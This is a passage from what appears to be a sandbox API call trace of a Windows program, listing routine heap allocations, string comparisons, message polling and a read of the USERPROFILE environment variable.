lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0205.135] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77bc0 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VirtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.137] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.137] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0205.137] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0205.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.138] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0205.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0205.139] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.139] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0205.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0205.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0205.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0205.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0205.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0205.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0205.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.142] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0205.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0205.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0205.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0205.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 